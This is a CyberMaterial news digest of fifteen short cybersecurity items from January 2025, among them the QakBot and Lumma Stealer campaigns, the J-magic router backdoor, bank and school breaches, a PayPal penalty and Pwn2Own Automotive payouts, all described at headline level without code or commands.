👉 What are the latest cybersecurity alerts, incidents, and news?

FBI, North Korean IT Workers, Steal Source Code, QakBot Malware, BackConnect Module, Steal System Data, Lumma Stealer, Fake CAPTCHA, ChatGPT, DDoS Attacks, J-Magic Campaign, Juniper Routers, Custom Backdoor, Phishing Attack, University of Texas at El Paso, Harrison County Schools, FalconFeedsio, Cryptocurrency Scams, Karnataka Bank, NEFT System, Ilem Group, Undersea Cables, Russian Spy Ship, PayPal, Cybersecurity Violations, US DOJ, Laptop Farm Scheme, Google, Identity Check, Android Security, Tesla Charger, Pwn2Own Automotive 2025.

Listen to the full podcast

🚨 Cyber Alerts

1. North Korean IT Workers Exploit Remote Jobs

The FBI has issued a warning about North Korean IT workers infiltrating companies to steal source code and extort employers. These operatives exploit remote work opportunities, concealing their identities through AI and face-swapping technologies during interviews. By gaining employment under false pretenses, they exfiltrate sensitive data, including source code, credentials, and session cookies, from company networks. They also use compromised GitHub repositories and personal cloud accounts to store stolen data, increasing the risks of intellectual property theft and cyberattacks.

2. QakBot Malware Enhances BackConnect Module

Researchers have uncovered the return of QakBot, a notorious malware loader, now enhanced with a new BackConnect (BC) module, which offers remote access and persistent control over infected systems. Walmart’s Cyber Intelligence team revealed that the BC module, identified as DarkVNC alongside IcedID’s KeyHole, allows threat actors to exploit the system for further attacks, including data theft and ransomware deployment. This discovery connects QakBot’s infrastructure to recent updates in malware like ZLoader, and highlights the sophisticated nature of its operators, who are likely supporting Black Basta ransomware attacks through these advanced tools.

3. Fake CAPTCHA Campaign Delivers Lumma Stealer

Cybersecurity researchers have raised concerns about a new malware campaign leveraging fake CAPTCHA verification checks to deliver the Lumma information stealer. The campaign has targeted global regions, including Argentina, Colombia, the United States, and the Philippines, affecting industries such as healthcare, banking, marketing, and telecom. The attack chain begins when victims are redirected to a fraudulent CAPTCHA page, leading them to execute a command that downloads the malicious Lumma payload.

4. ChatGPT Flaw Could Enable DDoS Attacks

A cybersecurity researcher has identified a significant vulnerability in OpenAI’s ChatGPT API that could enable Distributed Denial of Service (DDoS) attacks. The flaw stems from the way the API handles HTTP POST requests to a specific endpoint, where an attacker could send thousands of links in a single request, overwhelming the targeted server with excessive traffic. Experts suggest that implementing strict limits on the number of URLs and adding rate-limiting measures could mitigate the risk, helping prevent future exploitation.

5. J-magic Campaign Targets Juniper Routers

The J-magic campaign has focused on Juniper Networks enterprise-grade routers, deploying a custom backdoor to steal data and deploy additional payloads. According to Lumen Technologies, the backdoor monitors for a “magic packet” in TCP traffic, allowing attackers to gain control of infected routers by establishing a reverse shell. The malware targets sectors such as semiconductor, energy, and IT, with infections reported across multiple continents, including South America, Europe, and Asia.

💥 Cyber Incidents

6. Phishing Attack Hit UTEP Students’ Accounts

The University of Texas at El Paso (UTEP) has issued a warning to students about a recent phishing attack that resulted in the compromise of several accounts. Cybercriminals sent fraudulent emails to trick students into revealing their login credentials, which were then used to alter bank deposit information and redirect funds. Although UTEP confirmed that its systems were not hacked, the university has launched an investigation and contacted law enforcement while advising affected students to report the incident to the FBI’s cybercrimes unit.

7. Harrison County Schools Cyberattack Incident

The Harrison County Board of Education in West Virginia faced a cybersecurity incident on January 18, 2025, involving unauthorized access to certain computer systems. In response, the board quickly initiated an investigation, temporarily disabling the affected network to minimize further damage. External cybersecurity experts have been brought in to assess the situation and ensure that systems are secured moving forward.

8. FalconFeedsio X Account Hacked for Scams

FalconFeedsio’s X account was compromised, leading to the promotion of fraudulent cryptocurrency posts and scams. Despite being known for providing cybersecurity updates, the platform’s account was used to push links to dubious crypto-related sites. Cybersecurity experts and users are advising caution, warning others to avoid interacting with the links or posts coming from the compromised account.

9. Cyberattack Steals $280K from Karnataka Bank

A cyberattack targeted Karnataka’s BDCC Bank, exploiting vulnerabilities in its RTGS/NEFT transaction system. Hackers redirected around $280,000 (₹2.34 crore) by altering account details in XML files, diverting funds to 25 unauthorized accounts across northern India. The issue surfaced after customers reported unprocessed transactions, leading to the suspension of RTGS/NEFT services. An FIR was filed under cybercrime laws, with further investigations underway to identify and apprehend the culprits.

10. Boost Cyberattack Disrupts Client Services

On Sunday, January 19, 2025, Ilem Group’s subsidiary Boost became the victim of a targeted cyberattack, accompanied by a ransom demand. This malicious attempt aimed to compromise the company’s systems and disrupt its services, affecting around 15% of their more than 200 clients. Swift action by their expert cybersecurity teams led to the restoration of over 70% of the impacted systems in just under three days, demonstrating their commitment to minimizing the attack’s impact on clients.

📢 Cyber News

11. UK Investigates Undersea Cable Vulnerability

UK lawmakers are launching an inquiry into the vulnerability of undersea cables after a Russian spy ship was spotted mapping this critical infrastructure in British waters. The investigation follows a recent incident where a Royal Navy submarine surfaced near the Yantar ship to monitor its activities. The inquiry will examine the UK’s ability to protect these cables, which are essential for data transmission, and assess the potential risks of disruptions to this vital infrastructure.

12. PayPal to Pay $2M for Cybersecurity Failures

PayPal will pay a $2 million penalty to New York State after violating the Department of Financial Services’ (DFS) Cybersecurity Regulation. An investigation revealed that PayPal failed to use qualified personnel to manage key cybersecurity functions and didn’t provide sufficient training to address risks. As a result, sensitive customer data, including social security numbers, was left unredacted and exposed to cybercriminals.

13. DOJ Indicts Americans in North Korea Scheme

The U.S. Justice Department has indicted five individuals, including two Americans, for operating a laptop farm used to enable North Korean IT workers to scam U.S. companies. Erick Ntekereze Prince and Emanuel Ashtor, along with North Korean nationals Jin Sung-Il and Pak Jin-Song, facilitated this scheme by laundering money and allowing North Koreans to work remotely for U.S. firms. The group used compromised laptops to hide the North Koreans’ true identities, generating nearly $866,000 for Pyongyang’s government.

14. Google Launches Identity Check for Security

Google has rolled out a new feature called Identity Check for Android devices, enhancing security by requiring biometric authentication for sensitive actions outside of trusted locations. The feature locks settings such as access to saved passwords, screen lock changes, and factory resets, ensuring that only authorized users can perform these tasks. Currently available on Google’s Pixel phones and certain Samsung Galaxy models, Identity Check is part of an ongoing effort to strengthen device security against theft and unauthorized access.

15. Hackers Earn $129000 for Tesla Charger Hack

Hackers earned over $700,000 during the first two days of Pwn2Own Automotive 2025, with a significant portion coming from Tesla charger exploits. On the second day alone, researchers earned $335,500, including $129,500 for exploiting Tesla’s Wall Connector charger. Various teams targeted Tesla’s chargers, earning rewards for innovative exploits, while others took advantage of known bugs. The total reward pool for the event now exceeds $700,000, with more attempts scheduled for the final day.

Copyright © 2025 CyberMaterial. All Rights Reserved.